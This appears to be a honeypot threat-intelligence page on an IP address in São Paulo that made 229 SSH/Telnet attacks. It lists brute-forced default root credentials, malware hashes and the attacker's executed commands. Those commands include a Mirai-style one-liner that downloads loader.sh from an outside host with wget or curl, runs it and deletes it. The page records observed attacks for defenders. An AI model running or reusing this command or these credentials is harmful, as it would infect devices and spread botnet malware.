Active Threat • MEDIUM

109.104.155.28

Country of Origin🇧🇷 Brazil

First Detection4/18/2026

Last Activity4/18/2026

ISPBrainStorm Network, Inc

🎯

229

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇧🇷 Brazil
City: São Paulo
ASN: AS136258
ISP: BrainStorm Network, Inc

Attack Types

ssh_telnet_honeypot

Attacked Ports

Associated Malware

9641be11c9ed0855a453...→da41d24f215ed0146853...→

Attempted Credentials

🔐root/root

14x

🔐root/password

14x

🔐root/(empty)

14x

🔐root/admin

14x

Executed Commands

$echo mirai14x

cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x

13x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

/100

LowMediumHighCritical